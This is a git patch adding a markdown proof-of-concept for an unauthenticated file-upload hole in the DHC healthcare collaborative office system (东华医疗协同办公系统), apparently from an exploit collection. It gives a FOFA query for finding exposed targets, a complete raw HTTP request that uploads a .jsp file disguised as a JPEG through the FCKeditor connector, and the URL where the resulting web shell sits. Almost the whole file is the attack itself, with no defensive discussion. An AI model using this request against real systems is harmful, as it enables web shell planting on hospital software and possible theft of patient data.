From ffa0d01658407016fe1dd1a91070a1b94bc1db1e Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 31 Dec 2023 22:13:51 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E4=B8=9C=E5=8D=8E=E5=8C=BB=E7=96=97?= =?UTF-8?q?=E5=8D=8F=E5=90=8C=E5=8A=9E=E5=85=AC=E7=B3=BB=E7=BB=9F=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E4=B8=8A=E4=BC=A0.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 东华医疗协同办公系统文件上传.md | 43 +++++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 东华医疗协同办公系统文件上传.md diff --git a/东华医疗协同办公系统文件上传.md b/东华医疗协同办公系统文件上传.md new file mode 100644 index 0000000..882fd65 --- /dev/null +++ b/东华医疗协同办公系统文件上传.md @@ -0,0 +1,43 @@ +## 东华医疗协同办公系统文件上传 + +## fofa +``` +body="东华医疗协同办公系统" +``` + +## poc +``` +POST /common/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=&CurrentFolder=/ HTTP/1.1 +Host: xx.xx.xx.xx +Cookie: JSESSIONID=17A17E4D9E4E38B72D650895AFF7D1DF +Content-Length: 284 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 +Origin: https://xx.xx.xx.xx +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt1qdEWTI01cj5BLV +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Connection: close + +------WebKitFormBoundaryt1qdEWTI01cj5BLV +Content-Disposition: form-data; name="NewFile"; filename="123.jsp" +Content-Type: image/jpeg + +123 +------WebKitFormBoundaryt1qdEWTI01cj5BLV +Content-Disposition: form-data; name="Submit" + +upload +------WebKitFormBoundaryt1qdEWTI01cj5BLV-- +``` + +shell: https://xx.xx.xx.xx/common/FCKeditor/UserFiles/123.jsp